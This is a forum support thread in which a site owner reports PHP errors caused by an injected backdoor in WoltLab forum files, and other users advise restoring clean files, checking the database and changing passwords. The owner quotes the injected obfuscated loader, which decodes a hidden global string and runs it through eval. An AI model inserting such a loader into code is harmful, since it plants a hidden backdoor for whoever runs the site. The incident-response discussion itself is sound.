Namespace declaration statement

  • So... for whatever reason my forum suddenly started to show the PHP error message "Fatal error: Namespace declaration statement has to be the very first statement in the script in /xxxxxxxxxxxxxxxx/wcf/lib/system/WCF.class.php on line 2"


    After "$GLOBALS["lbrtdp"]=" it shows a lot of gibberish letters and later in the line it shows "
    if (!function_exists('ichyaoyy')){function ichyaoyy($a, $b){$c=$GLOBALS['lbrtdp'];$d=pack('H*','6261736536345f646563'.'6f6465'); return $d(substr($c, $a, $b));};eval(ichyaoyy(565,3299));};?><?php
    namespace wcf\system; "


    Is that normal? And how do I fix it?

  • After "$GLOBALS["lbrtdp"]=" it shows a lot of gibberish letters and later in the line it shows "
    if (!function_exists('ichyaoyy')){function ichyaoyy($a, $b){$c=$GLOBALS['lbrtdp'];$d=pack('H*','6261736536345f646563'.'6f6465'); return $d(substr($c, $a, $b));};eval(ichyaoyy(565,3299));};?><?php
    namespace wcf\system; "

    You should replace the file by it's original: https://github.com/WoltLab/WCF…/lib/system/WCF.class.php


    Check the other files for those strange codes, too. Seems like somthing got into your FTP and changed files... So it would be the best to change your FTP-password.


    Do you use Filezilla?

  • Danke. Yep, I use FileZilla. And it's not the only file that got affected. It's a whole bunch of them but I'm replacing them so it should be fine soon.

  • Your server is compromised. Someone infected your website with a PHP backdoor.


    Your strategy:
    -Contact your ISP, maybe your server (if you have one) is part of a botnet or sends spam.
    -Close all ports except SSH. Change your root password.
    -Save a sql dump and the wcf upload folder
    -If you have backups or tools like VEEAM, find a none compromised version and restore it.
    -Check your SQL Database for suspicious entrys (user, privileges ...)
    -Import your SQL dump and the useruploads
    -Hope that you didn't overlook something.
    -Change all your server passwords and maybe your private passwords.
    -reopen all ports and inform your users. They should also change their passwords.


    If you have webspace, some steps are different, but in general: Change everything, delete everything. If you loose some data, that's the price for getting hacked.


    After you have cleaned everything you should investigate who had access to your website/computer. Did you know that FileZila stores your login in plaintext? Do you share logins? Are your passwords weak? Do you have any malware on your PC?

  • you should take a look in your current dump and backup dumps. Check the wcf users table. Are there some (new?) users with admin or mod privileges? Also check your mysql.users table. If you find nothing you can use this dump/backup

  • Nothing strange here... I reverted to the last backup but nothing has changed. So there must be something file-wise. "/" shows me a blank page but "/index.php/BoardList" shows me this. Could it be that the person screwed the template files aswell? Luckily I can access the ACP now.

  • It seems the database wasn't infected at all. Also it shows a blank page for me... and there doesn't seem to be anything wrong in the error log.

  • Both backups need to match, otherwise your installation becomes unstable. If you can't revert to a stable, uninfected state, your best bet would be a fresh installation and a data import from your database.


    But before you have to clean the infected system which is most likely your own computer. When done, uninstall Filezilla completely and make sure that there's nothing left (e.g. using CCleaner after uninstall). If you need a graphical interface, check out WinSCP instead.


    If you are sure that your system has been cleaned, you should change all your passwords. If you've stored FTP informations of your friends, too you should inform them that they need to change their password, too.

  • Like I said, the previous backup was not infected and the only thing that is different that there are less posts... Again, like I said, I suppose the person screwed the templates aswell, as you can see here. I can access the ACP just fine though.


    I guess I'll need to make a ticket then. If everything else fails, I'd shut down the forum.

  • Cleared the cache, nothing changed... the backup files are compressed and I don't see a change in the "last modified" date, I fixed every infected file, so I don't really know why "/" shows me a blank page and the forum index only shows my user name and another dot below.

    • Official Post

    Your site looks fine to me, but maybe the issues you're observing only happens when logged-in rather than viewing it as a guest. You might want to check the page source, changes are that it reveals some kind of error message.

  • Okay so the page which showed you a 500 error (and oddly showed blank for me) is kinda fixed, according to the log there were a few more infected files. But now the same problem persists like in the forum index... check it out.


    EDIT: Also the log still spits out the error below despite I checked multiple times if there is something wrong. And yeah it's the first statement...


    [24-Dec-2015 11:51:54 Europe/London] PHP Fatal error: Namespace declaration statement has to be the very first statement in the script in /xxxxxxxxxxx/SonicGamesDimension/wcf/lib/data/user/online/UserOnlineAction.class.php on line 2


    it looks like this:


    PHP
    <?php 
    namespace wcf\data\user\online;
    use wcf\data\AbstractDatabaseObjectAction;
    use wcf\system\cache\builder\UserGroupCacheBuilder;
    use wcf\system\exception\IllegalLinkException;
    use wcf\system\WCF;

    Edited 2 times, last by NeonSynth ().

Participate now!

Don’t have an account yet? Register yourself now and be a part of our community!